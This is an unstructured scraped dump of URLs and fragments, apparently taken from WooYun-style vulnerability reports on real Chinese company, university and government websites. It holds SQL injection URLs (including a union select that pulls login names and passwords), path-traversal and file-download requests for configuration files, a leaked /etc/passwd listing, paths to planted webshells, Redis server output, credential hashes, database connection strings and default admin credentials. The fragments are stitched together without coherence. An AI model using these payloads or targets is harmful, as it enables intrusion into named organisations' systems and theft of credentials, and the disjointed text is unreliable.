http://www.greenwaychina.org/index.php/zh/ URL:http://yule.2258.com/mingxing/pandian/940746.html URL:http://yule.2258.com/mingxing/pandian/940746.html?id=940746 http://**.**.**.**/tnyouth/news_detail.asp?CateID=1&NewsID=29027 http://zbj.glodon.com http://zbj.glodon.com/web-console http://**.**.**.**/ http://**.**.**.**/ws/certificate/queryForWs_CertificateListLook.do http://**.**.**.**/ws/certificate/queryForWs_CertificateListLook.do http://vip.stock.finance.sina.com.cn/fund_center/data/jsonp.php/funds_jjpj/FundRank_Service.getHTSMFundManagerInfo?page=1&num=6&sort=new_star_level*&asc=0&ccode=&type=0&date= https://mail.midea.com http://**.**.**.**/index.php?g=Back&m=Entrance&s=login http://**.**.**.**/index1.php http://xxxxxx/background/updateactivityemailnum.php?ID=1 http://218.85.77.165:7777/ http://vip.stock.finance.sina.com.cn/fund_center/api/jsonp.php/funds_yinhe/FundRank_Service.getYHFundInfo?page=1&num=6&sort=year3grade&asc=0&ccode=&type=01*&type3=&date=&%5Bobject%20HTMLDivElement%5D=o9kgo http://**.**.**.**/web/show.asp?tname=dtcz&id=7780 http://219.146.73.48/admin/ http://**.**.**.**/ https://mail.youxinpai.com http://vip.stock.finance.sina.com.cn/fund_center/data/jsonp.php/funds_chenxing/FundRank_Service.getMSFundInfo?page=1&num=7&sort=nav*&asc=0&ccode=&type=1&type3=&date= http://es.fesco.com.cn/Esvr/Home/lostpass2?uid=xxx&ks=6f935832c7f126da4c0ee2c2db1722f9 http://**.**.**.**/ http://v2.htsc.com.cn:443 http://**.**.**.**/manage/manage.aspx http://**.**.**.**:8080/admin-console lkl.creditcard.cmbc.com.cn/admin/index.php?a=login&c=index&dosubmit=1&m=admin http://**.**.**.**/ http://**.**.**.**/zxjl_wenti_list.php?huifu=&pg=1&zxjl_type=1 icfs.swufe.edu.cn/index.php?a=download&file= icfs.swufe.edu.cn/index.php?a=download&file=index.php icfs.swufe.edu.cn/index.php?a=download&file=/framework/kernel.php icfs.swufe.edu.cn/index.php?a=download&file=/temp/configs/config.inc.php http://**.**.**.**/lm/moreinfo.asp?typeid=06 
http://**.**.**.**/bud/doc/news.asp?ID=1249%20and%20exists%28select%20*%20from%20du1al%29-- http://bjidc.net/ http://**.**.**.**/sudents.php?Cata=17 http://vip.ufida.com.cn/nccsm/ http://nczx.yonyou.com/SubModule/role/ http://nczx.yonyou.com/Inc/ ftp://192.168.8.86 ftp://125.35.5.232 http://ucenter.b5m.com/tologin.htm http://op.t.b5m.com/ http://adm.b5m.com/ http://mail.b5m.com/ http://zbj.glodon.com/homepage.html https://account.glodon.com/register?return_to=http://zbj.glodon.com http://123.57.91.68/level2.jsp?caid=002 http://123.57.91.68/web-console http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:7060/ http://**.**.**.**:7060/ http://usmelody.lenovo.com:8080 http://**.**.**.**/link?url=Ezpi7c7gO_UfC6EfS7KNlWKzUaLOMBwrizcnFL2CSJfak4iclvXlHfPZvE5jcrLeEH-YJ-IKNA_OAUTJ4bA_5useJaB5QBhmEechKSG-Ws7 https://**.**.**.** http://**.**.**.**:8080/ http://www.51vj.cn/login/forget http://**.**.**.**/cjob/index.do http://jwxt.nwu.edu.cn http://**.**.**.**:7001/index/openRoad.do http://**.**.**.**:7001/test.jsp http://**.**.**.** http://en.med.tsinghua.edu.cn/ http://**.**.**.**/web-sss/org.alle.sss/Index.action http://www.easysources.cn/z_yijiadan.aspx?id=678880 http://pms.ztehome.com.cn http://pms.ztehome.com.cn/data/upload/shell.php http://**.**.**.**/bugs/wooyun-2010-0145666 http://weixin.1yyg.com/member/index.do http://www.yy.hk.cn/网站进行了一次扫描,发现存在wwwroot.rar备份文件。 http://**.**.**.**/home2/login.action http://w.gaopeng.com/.svn/entries http://mtest.gaopeng.com/.svn/entries eg:http://**.**.**.**/info.aspx?id=158 http://yk.ykinns.com:8888/pms/rt_index.html http://**.**.**.**/shownews.asp?ID=851 http://**.**.**.**/shownews.asp http://www.gradms.sdu.edu.cn/login http://**.**.**.**/ReportServer?op=fs_load&cmd=fs_signin http://**.**.**.**/usercenter.do http://**.**.**.**/pic.jsp http://**.**.**.**/ewebeditor/admin/login.jsp http://jenkins.ufenqi.com http://**.**.**.**:8090/ http://**.**.**.**/images.do?filename=../../../../../../../../../../ 
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin saslauth:x:498:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pulse:x:497:496:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin KQZyeTd7Bp9I2T18on6ep4kmR7BOYQtDVZ4dTzJjJXmSjiUw9LZEttIlfhR9n3q00:16665:0:99999:7 root:x:0 bin:x:1:bin,daemon daemon:x:2:bin,daemon sys:x:3:bin,adm adm:x:4:adm,daemon tty:x:5 disk:x:6 lp:x:7:daemon mem:x:8 kmem:x:9 wheel:x:10 mail:x:12:mail,postfix uucp:x:14 man:x:15 games:x:20 gopher:x:30 video:x:39 dip:x:40 ftp:x:50 lock:x:54 audio:x:63 nobody:x:99 users:x:100 dbus:x:81 usbmuxd:x:113 utmp:x:22 utempter:x:35 
avahi-autoipd:x:170 desktop_admin_r:x:499 desktop_user_r:x:498 floppy:x:19 vcsa:x:69 rpc:x:32 rtkit:x:497 abrt:x:173 cdrom:x:11 tape:x:33 dialout:x:18 haldaemon:x:68:haldaemon ntp:x:38 apache:x:48 saslauth:x:76 postdrop:x:90 postfix:x:89 avahi:x:70 rpcuser:x:29 nfsnobody:x:65534 pulse:x:496 pulse-access:x:495 fuse:x:494 gdm:x:42 stapusr:x:156 stapsys:x:157 stapdev:x:158 sshd:x:74 tcpdump:x:72 slocate:x:21 http://www.nfu.edu.cn/ http://**.**.**.**/szrmyy/wp-admin/users.php http://xinshi.swu.edu.cn/xinshisuo/index.php https://i.feiniu.com/lostPwd/verifyIdentity?key=865ea2a1e35e91b72c86d44ca2d32461 https://i.feiniu.com/lostPwd/setNewPwd?key=xxxxxx。后面拼接上第二步的key就行了 http://mail.faw.com.cn/ http://**.**.**.**:82/login.TJ http://**.**.**.**/wsbs http://www.maka.im/user/fpwd http://elearning.firstcapital.com.cn:81//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 ftp://**.**.**.**/ http://www.infohold.com.cn/index?st=infobank'%20AND%203*2*1%3d6%20AND%20'000eQ54'%3d'000eQ54 http://**.**.**.**/存在joomla反序列化漏洞 https://security.9666.cn/login.action https://security.9666.cn/login.action http://**.**.**.**/system/Admin_index.asp http://**.**.**.**/CmsEditor/admin_style.asp http://**.**.**.**/usr/PxBs001.asp http://bizhi.sogou.com/bbs/ http://**.**.**.**/news_two.aspx?cateid='%22&newsCateid=41&NewsId=708 http://**.**.**.**/bugs/wooyun-2014-061258来的猥琐思维 http://**.**.**.**/about.aspx?BaseInfoCateID='%22&CateID=12 http://**.**.**.**/dqgg_two.aspx?cateid=25&newsCateid='%22&NewsId=773 http://**.**.**.**/en/news.aspx?CateID=39&NewsCateId='%22 http://**.**.**.**/en/pro.aspx?CateID=20&ProductsCateID='%22 http://**.**.**.**/en/pro_two.aspx?CateId=119&ProductsCateID=119&ProductsID='%22 http://**.**.**.**/zp_two.aspx?CateId=32&PositionId='%22 http://**.**.**.**/tw/cloud/index_event_single.asp?cnlid=16&e=0&pid=053A10829 http://job.fescoadecco.com http://job.fescoadecco.com http://sky.jnu.edu.cn/ftp.php?filename= http://sky.jnu.edu.cn/ftp.php?filename=index.php 
http://sky.jnu.edu.cn/ftp.php?filename=banner.php http://sky.jnu.edu.cn/ftp.php?filename=link.php http://**.**.**.** http://**.**.**.**/depart_web/dw/dk/admin/article_show.asp?ArticleID=3076 http://wooyun.org/bugs/wooyun-2015-0161947 www.pangthai.com http://**.**.**.**/timsystem http://**.**.**.**/v_news.php?classid=46&id=3530 http://**.**.**.** http://**.**.**.**/myAction.do?method=execute2&id=3617* http://oa.wasu.com.cn:8088/ http://oa.wasu.com.cn:8080/oem.jsp http://zhpt.dfl.com.cn/pipms/client/news_view.jsp?id=294 http://218.16.100.212:8080/gionee/ http://218.16.100.212:8080/gionee/shell.jsp http://**.**.**.**/ http://**.**.**.**///web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://**.**.**.**///web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager http://**.**.**.**/teacherList.php?id=4 http://sso.haier.net http://sso.haier.net/job/index.jsp http://anhuinews.zhuna.net/hotellist.php?cityid=1301*&txtCity=%E5%90%88%E8%82%A5&tm1=2015-12-18&tm2=2015-12-19&seachQ= http://www.vcyber.com/manager/Upload_img"需要自己去构造。。 http://www.vcyber.com//manager/Upload_img http://**.**.**.**/ http://1.202.165.69:7007/clqprt/LoginAction.action http://**.**.**.**/官网哦 http://**.**.**.**/jspspy.jspx encap:Ethernet AE:8B:3B:5A:22 fe3b:5a22/64 Scope:Link MTU:1500 packets:149526305 packets:120117439 txqueuelen:1000 www.airpp.com和www.airpp.net http://sys.airpp.com/pptravel/userManagerAction!login.action https://github.com/stephenxiu/happygo365/blob/7235d01926d22983a6c64faed345b80a3c7d5be1/control/member.php http://**.**.**.**/web/news.do?action=detail&id=201512080544313224* http://www.faw-logistics-oa.com/ http://**.**.**.**/professional.php?para1=9 http://222.195.158.225/oucjw/cas http://**.**.**.**/list/ks3.php?zlm=9 http://**.**.**.**/include/web_content.php?id=9 http://**.**.**.**/list/index.php?zlm=9 http://oa.fawbcc.com.cn/ http://**.**.**.**/?from=wsyc 
http://jifen.dodopal.com/index.php/rewards-so_showlist-1.html?scontent=* http://**.**.**.** encap:Ethernet E0:81:DC:5F:92 fedc:5f92/64 Scope:Link MTU:1500 packets:60161223 packets:53632790 txqueuelen:1000 http://**.**.**.**:8080/ http://xyb.swu.edu.cn/ http://**.**.**.**/console/login/LoginForm.jsp http://**.**.**.**/seeyon/ http://**.**.**.**/seeyon/management/index.jsp http://**.**.**.**/seeyon/logs/login.log http://**.**.**.**/news_more.asp?lm=&lm2=64 http://**.**.**.**/DataDetail.aspx?type=gzz&id=123 http://www.dodopal.com/Download/,更新至最新版本1.4.0.4 http://**.**.**.**:8080/login.jsp https://github.com/zerocool438/syFront/blob/ebf9dda8ebd95dec0e7fc035b5f4c7ea61ecaaae/project/sbin/smtp.py.bak http://hcm.yonyou.com/cao.aspx http://oa.crpcg.com:8080/seeyon/index.jsp http://oa.crpcg.com:8080//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=xxxuser&P_2_String=xxxpwd http://oa.crpcg.com:8080//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=&RVT=XML&P_1_String=xxxuser&P_2_String=xxxpwd com:8080 http://hz.cofcopack.com:8015/ http://wooyun.org/bugs/wooyun-2010-0132689 http://**.**.**.**/gg_com.jsp?bill=42 http://**.**.**.**:7001/admin/login.php http://**.**.**.**:7001/article_c.php?id=288 http://**.**.**.**/Article/Show.aspx?aid=433&id=7 http://denglish.e21.cn/exam/queryproductlistAction.do?type=info&pid=322 http://oa.sinopharmholding.com http://oa.sinopharmholding.com/seeyon/management/index.jsp http://oa.sinopharmholding.com//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=zzz&P_2_String=123 http://oa.sinopharmholding.com//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=tre&RVT=XML&P_1_String=zzz&P_2_String=123 http://**.**.**.**/ http://www.ooopic.com/jianyi.php http://60.28.201.5:2000/idc/ http://60.28.201.5:2000/device/550/ http://60.28.201.5:2000/admin/ http://60.28.201.5:2000/idc/9/北京地区内部机房地点了,北京市海淀区知春路皇冠假日酒店写字楼,有时间路过再拜访下内网。 
www.700du.cn http://www.700du.cn http://123.59.13.114:8080/script redis_version:2.4.7 redis_git_sha1:00000000 multiplexing_api:epoll gcc_version:4.4.6 multiplexing_api:epoll gcc_version:4.4.6 process_id:1041 uptime_in_seconds:63210637 uptime_in_days:731 lru_clock:338689 used_cpu_sys:84255.39 used_cpu_user:33401.28 used_cpu_sys_children:0.00 used_cpu_user_children:0.00 used_memory:11248256 used_memory_human:10.73M used_memory_rss:427347968 used_memory_peak:178719528 used_memory_peak_human:170.44M mem_fragmentation_ratio:37.99 mem_allocator:jemalloc-2.2.5 changes_since_last_save:2310025 last_save_time:1448283306 total_connections_received:5106809 total_commands_processed:500165572 expired_keys:1704644 keyspace_hits:42944402 keyspace_misses:19498151 role:master db0:keys=4,expires=0 db1:keys=3385,expires=2 db3:keys=9,expires=0 db5:keys=2,expires=0 db6:keys=10,expires=0 db9:keys=976,expires=976 db10:keys=69,expires=69 db11:keys=3385,expires=1968 db12:keys=8,expires=0 db13:keys=4,expires=4 http://img3.codoon.com/portrait/0c4626a3-d0a3-411d-8351-4469a667d05c/2015-10-28T21:50:54 http://img3.codoon.com/portrait/0c4626a3-d0a3-411d-8351-4469a667d05c/2015-10-28T21:50:54 http://img3tw.codoon.com/gps119397e29e21481f8a0582c358a95f92 http://img3tw.codoon.com/gpsa3bed04ac4674c88afe728f161bc6cde http://img3tw.codoon.com/gpscd3efffd8caa4ef090861e8f27a2f59b http://img3tw.codoon.com/gpsda6e429df95145369421e2c2ab26eaab http://eins.xintai.com/eins/page/insure/CustomerInfoWrite.action http://oa.vcyber.com/ http://hr.vcyber.com/ http://erp.vcyber.com/ http://cm.vcyber.com/ http://oa.vcyber.com//oa/admin/application/file_download.jsp?filePath=c:\windows\system.ini http://**.**.**.**/coremail/index.jsp?cus=1 http://**.**.**.**/ http://**.**.**.**:7001/console/login/LoginForm.jsp http://**.**.**.**:7001/wa/wa/ma3.jsp http://**.**.**.**:8181/auth/login.action http://weixin.bestv.com.cn/ http://weixin.bestv.com.cn/admin/ 
http://weixin.bestv.com.cn/admin/upload/image/live_carousel/cacbf914-9007-42ed-9fbe-97fffdfea5c9.jsp http://mail.baofoo.com/ http://**.**.**.**/mobilejob/www/show_jianli.php?id=35311&pid=123&type=60 http://**.**.**.**/ http://www.piaohomeinn.com http://www.piaohomeinn.com/hotelList?hotelId=43 http://www.piaohomeinn.com/hotelComments?hotelId=37&commentId=4906#commentSearch http://www.piaohomeinn.com/ajaxResp?type=orderDetail&ordersign=20151218124430oz http://222.74.204.53:80/ http://cwc.tongji.edu.cn/WFManager/wingsoft/common/newsList.jsp?qry=qwe http://www.cdbl.cn/ViooMa/login.php http://220.160.108.24:8000/ http://club.jj.cn/detail/index/index/cid/2015956 http://app.huawei.com/iRiver-Agent/user.do http://202.85.212.112/MS/index.jsp http://s.wanxue.cn http://s.wanxue.cn/findpw1.do http://s.wanxue.cn/findpw2.do http://**.**.**.**/home.jsp,图中标识链接存在漏洞 http://**.**.**.**/login.action存在命令执行漏洞 https://account.guokr.com/weibo/sign_in/?success=https%3A%2F%2Faccount.guokr.com%2Fsettings%2Fexternal_account%2F https://passport.csdn.net/auth/sinat http://ucenter.51cto.com/api/auth.php?type=sina http://static.qyer.com/upload/mobile/guide.apk http://**.**.**.**:8087 bbf:150:1017%13 b762:1f0f:7c00%10 http://www.ztccct.com/news.php?id=28&page=2 http://www.ztccct.com/content.php?id=28&aid=28 http://www.ztccct.com/page.php?id=39 http://www.zhihu.com/oauth/redirect/bind/sina?next=/oauth/callback http://www.hihuu.com/ http://120.55.138.90/ http://120.55.138.90/file/2015-12-18/e97e3d46eba84a0e9397342e5b1855a0.jsp http://passport.jumei.com/i/extconnect?site_name=sina_weibo&redirect=http%3A%2F%2Fi.jumei.com%2Fi%2Faccount%2Fsync_share http://sime.sufe.edu.cn/.git/config http://**.**.**.**)的本意是搜索时看不到联系方式,想要看联系方式需要充值或者上传其他人的简历。 http://**.**.**.**/custom_customindex.action http://i.youku.com/partner_thirdPartOnlyBind/tlsite_sina_tlclient_ykwebb http://lebook.me/?op=output&cid=27925&format=html&fid=0 http://erp.vcredit.com:82/ http://campus.social-touch.com/ 
http://campus.social-touch.com/campus.zip http://ybtpadmin.chinacloudsites.cn/ http://**.**.**.**/admin/Uadmin.html http://**.**.**.** http://58.245.254.229/edms/index.php http://wooyun.org/bugs/wooyun-2010-0153296这个漏洞发现存在svn但主目录不存在 http://www.agrite.com.cn/data/mysql_error_trace.inc d90c:117e:fc59:77a6%14 jdbc:oracle:thin:@localhost:1521:orcl http://**.**.**.** http://kofno.cn/ http://kofno.cn/admin.php?r=page/Category/index&class_id=40 http://kofno.cn/admin.php?r=admin/login/ http://helpdesk.sunits.com/ http://helpdesk.sunits.com/hd/login!findPass.do http://**.**.**.**/web/guest/ssologin http://**.**.**.**/lcxweb/index.ext http://payen.eyougame.com/ http://221.7.13.160/npage/login/login.jsp http://**.**.**.**/ jdbc:oracle:thin:@**.**.**.**:1521:orcl http://cisco.sysu.edu.cn/index.php中山大学思科网络技术学院 http://**.**.**.**/ jdbc:mysql://**.**.**.**/OA http://**.**.**.**:88/swj//FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http%3A%2F%2F**.**.**.**%3A88%2Fswj%2F%2FFCKeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx http://**.**.**.**/ http://**.**.**.**/Admin/Admin_Index.asp http://**.**.**.**/wooyun.txt http://**.**.**.**/wooyun.txt http://**.**.**.**/ewm.php?code=2871871AX174141/ http://**.**.**.**/网站 http://**.**.**.**//web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://**.**.**.**//web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager http://www.bszc.net/about1.asp?id=67,博盛租车,如图所示: http://oa.bszc.net/user/Logon,租赁平台,如图所示: http://yiapi.xinli001.com/fm/forum-share-page/5875 http://yiapi.xinli001.com/fm/forum-share-page/5896 http://wooyun.org/,将会变成: http://www.zhihu.com/scraper: www.127.0.0.1.xip.io是解析到127.0.0.1的,请求可以发现get成功: https://status.zhihu.com/login http://**.**.**.**/ http://srm.jinjianghotels.com/JJSRM/Portal/ProductInfoList.aspx?RootProductionCatalog=M http://oa.bjgold.com.cn/login/Login.jsp存在Caucho 
http://oa.bjgold.com.cn/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://oa.bjgold.com.cn/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml pince:Txpd1jQc/xwhISIqodEjfw==:staff,website filch:KmZIq2RKXAHV4BaoNHfupQ==:staff http://oa.bjgold.com.cn/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class http://lexue.lenovo.com.cn/ http://211.144.38.149 http://smile.wanda.cn/app/oauth/editpw http://**.**.**.**/ http://**.**.**.**/admin.php http://**.**.**.**/controller/contro.php?action=login_check&login_username=admin*&login_password=admin&m=0.9825822759885341 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin cimsrvr:x:499:500:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:498:496:RealtimeKit:/proc:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin saslauth:x:497:76:"Saslauthd saslauth:/sbin/nologin rpcuser:x:29:29:RPC 
User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin qpidd:x:496:499:Owner Daemons:/var/lib/qpidd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ricci:x:140:140:ricci user:/var/lib/ricci:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin amandabackup:x:33:6:Amanda user:/var/lib/amanda:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash qemu:x:107:107:qemu user:/:/sbin/nologin memcached:x:495:494:Memcached daemon:/var/run/memcached:/sbin/nologin radvd:x:75:75:radvd user:/:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin pulse:x:494:493:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin piranha:x:60:60::/etc/sysconfig/ha:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash luci:x:141:141:luci application:/var/lib/luci:/sbin/nologin dovecot:x:97:97:Dovecot server:/usr/libexec/dovecot:/sbin/nologin dovenull:x:493:490:Dovecot's user:/usr/libexec/dovecot:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin lytz:x:500:502:lytz:/home/lytz:/bin/bash oracle:x:501:502::/home/oracle:/bin/bash WebBase.war/tm/ jdbc:mysql://localhost:3306/devbase http://**.**.**.**:80/ http://**.**.**.**:778/zx/admin/manager.jsp www.lashou.com http://esmdev.worldunion.com.cn:8080/toolbook/partner/pingtai.jsp http://wusms.worldunion.com.cn:8082/toolbook/tolearnLogin.action存在命令执行漏洞 http://member.multigold.com.cn/login/repassword.html http://www.multigold.com.cn/product/296-0.html#detail-tt,一定都是多金主,用户名都这么霸气:chenxingchen888 http://www.multigold.com.cn/product/1120-0.html#detail-tt,就不能跟上面的比了,名字都叫:nana323 http://**.**.**.**:80/ http://**.**.**.**/ http://mat.tongji.edu.cn http://rtpnr.com 
http://**.**.**.**/NewsList.aspx?aId=011002 http://**.**.**.**/left-news2.php?no=29940 http://**.**.**.**/index.php?g=Wap&m=Dining&a=ShowDetail&id=1 username:admin passwd:admin http://**.**.**.**/news_content.php?id=180 http://**.**.**.**/login.jsp http://hk5.midea.com/recal.php?detail=1&lang=c&no=1 http://r8i318.rrenren.com.qozea.party/qzone/qqwap/qq_zc http://www.cofcoet.com/en/yewu.asp?lt=13*&Pone=2 http://www.cofcoet.com/en/honor.asp?Ititle=%B9%A4%B3%CC%D7%DC%B3%D0%B0%FC http://www.cofcoet.com/yewu.asp?lt=10*&Pone=6 http://www.cofcoet.com/hjhonor.asp?Ititle=123&IOne=4&Itwo=10* http://www.cofcoet.com/en/hjhonor.asp?Ititle=123&IOne=4&Itwo=10* http://www.cofcoet.com//honor.asp?Ititle=%B9%A4%B3%CC%D7%DC%B3%D0%B0%FC* http://login.passport.9you.com/ http://211.144.223.76/aresmanage/logon/logon1024.jsp http://www.intimecity.com.cn/fh/admin/login.php http://mbaen.rbs.org.cn http://**.**.**.**:1723/yyoa/ http://**.**.**.**:1723/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://www.dfcv.com.cn/ModelPages/MarketActivity/MAVideo.aspx?ColumnCode=-1 http://**.**.**.**/Login.asp http://**.**.**.**/noc/user_login.php http://**.**.**.**/news.php?news_id=696&languages_id=tw http://**.**.**.**/ckfinder/ckfinder.html http://ott.topway.cn/ottindex/topway.html http://116.77.70.115:8080/ http://**.**.**.**/ http://**.**.**.**/index.php/bmd/dosubmit http://**.**.**.**/Admin http://cert.chemao.com.cn/ http://112.126.83.103/gbistm/ http://115.29.142.32 WFRechargeSites.aspx/LoadAreaSites http://**.**.**.** http://**.**.**.** http://182.92.8.131/ http://www.uaes.com/ http://www.uaes.com:7001/1123/ http://www.uaes.com:7001/a/ http://www.uaes.com:7001/cmd/ http://www.uaes.com:7001/dll/ http://www.uaes.com:7001/ggga/ http://www.uaes.com:7001/tian/ http://www.uaes.com:7001/win/ jdbc:oracle:thin:@192.168.51.150:1521/uaesweb http://www.wooyun.org/bugs/wooyun-2015-0162596/trace/d0fc97930194e1e79efed3b342180193, http://mail.huatu.com 
http://211.151.59.22/manage/ http://211.151.59.22/robots.txt User-agent:Sogou User-agent:Sogou User-agent:Yahoo Disallow:/food/search/menu_* http://i.netqin.com/sitemap.xml http://120.25.213.204:8004/home http://**.**.**.**/gonggao.php?tid=181 www.grhao.com http://www.grhao.com port:161 dork:Huawei port:161 http://**.**.**.**:8888/bdcrm/login.do?method=login http://**.**.**.**:7776/mes/login.action URL:http://**.**.**.**存在兩個SQL注入 http://**.**.**.**/bbs_member.php?id=1 ISO9001:2000质量管理体系认证,荣获“国家星火计划项目”,2011年荣膺“农业产业化国家级重点龙头企业”,并荣获“安徽省质量奖”,2013年成为中国小麦粉加工50强和国家高新技术企业。2014年再次荣膺“农业产业化国家重点龙头企业”,并被国家科技部认定为“国家火炬计划重点高新技术企业”。 http://**.**.**.**:7001/defaultroot/login.jsp http://pop.weibo.com/follow http://pop.weibo.com/follow http://**.**.**.**/sharecourse/course/view/courseList?order=&keyword=%27 http://3kloan.com/login.do?method=jgdy&yid=13&cid=6注入点 http://www.3enong.com/admin/index.php http://**.**.**.**/cn/01news/newsDia.php?cate_id=39&bull_id=12220 www.metinfo.cn http://www.metinfo.cn http://**.**.**.**/newsDetail.php?id=5 http://**.**.**.**/product_powerAjax.php?id=30 http://**.**.**.**/admin/index.php www.wjw.cn http://m.wjw.cn/m.wjw.cn.rar http://**.**.**.**:7001/defaultroot/login.jsp http://econ.sufe.edu.cn:80/ http://e.sinopharm.com http://oa.vatti.com.cn/ http://mail.vatti.com.cn http://**.**.**.**/sc_webcat/ecat/cms_view.php?lang=3&web_id=1 http://**.**.**.**/ http://**.**.**.**// http://**.**.**.**//web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://**.**.**.**//web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager http://220.179.196.7:7001/defaultroot/login.jsp www.hunantvhr.com http://222.240.176.21/index.php?m=job&c=index&action=detail http://222.240.176.21/uploadfile/pic/2015/1219/20151219114557279.jpg http://222.240.176.21/uploadfile/pic/2015/1219/20151219114557279.jpg/.php http://222.240.176.21/7.php URL:115.236.172.106 http://jyzd.sy.e21.cn/show_news.php?news_id=114 
